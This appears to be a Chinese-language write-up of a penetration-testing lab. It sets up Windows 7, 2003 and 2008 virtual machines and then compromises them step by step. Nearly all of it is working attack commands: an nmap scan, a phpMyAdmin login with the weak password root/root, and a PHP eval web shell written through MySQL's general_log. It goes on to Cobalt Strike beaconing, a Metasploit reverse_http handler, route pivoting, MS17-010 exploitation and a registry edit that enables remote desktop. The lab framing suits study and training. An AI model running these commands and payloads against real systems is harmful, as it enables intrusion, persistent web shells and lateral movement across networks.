目录
靶场搭建
1.新建一个仅主机模式的网络,VMnet15
2.添加网络适配器
将windows2003和windows2008和windows7主机都设置为自定义VMnet15
攻击主机kali为net
设置好之后,win7主机开启phpsyudy,配置就完成了
win7 内网网段192.168.152.128
win2003 内网网段192.168.152.129
win2008 内网网段192.168.152.130
WEB服务器渗透
1.端口扫描
nmap -sS -sV -Pn 192.168.152.128
发现开放80端口证明存在http网站
开放了3306端口,存在mysql数据库,可能存在弱口令
访问网页,发现为phpstudy探针,说明网站是phpstudy搭建的
发现mysql存在root,root弱口令
2.登录后台
网站是由phpstudy搭建的就可能存在phpmyadmin后台
弱口令root,root,成功登录到后台
3.一句话木马
查看数据库是否有导入权限,看能否直接导入木马
SHOW GLOBAL VARIABLES LIKE '%secure%'
没有导入权限
查看是否有开启日志记录
SHOW GLOBAL VARIABLES LIKE '%general%'
日志记录功能关闭,但是可以开启
SET GLOBAL general_log = ON
SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php'
插入木马
select '<?php eval ($_POST[hack]);?>'
用蚁剑连接
4.上线cs
使用cs生成一个木马,通过蚁剑上传并执行
上线成功后,首先执行sleep 0
内网渗透
1.内网主机存活扫描
2.systeminfo发现域
3.查找域控
shell net time /domain
4.明文密码
5.域控上线cs
生成一个正向监听
上线成功
6.win2003上线
cs设置5555端口监听
开启msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.164.134
set lport 5555
run
设置路由
run post/multi/manage/autoroute
run autoroute -p
bg
search ms 17_010
use 2
set rhosts 192.168.152.129
//开启3389
'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t 00000000 /f'
run
设置代理
设置小红帽
开启远程桌面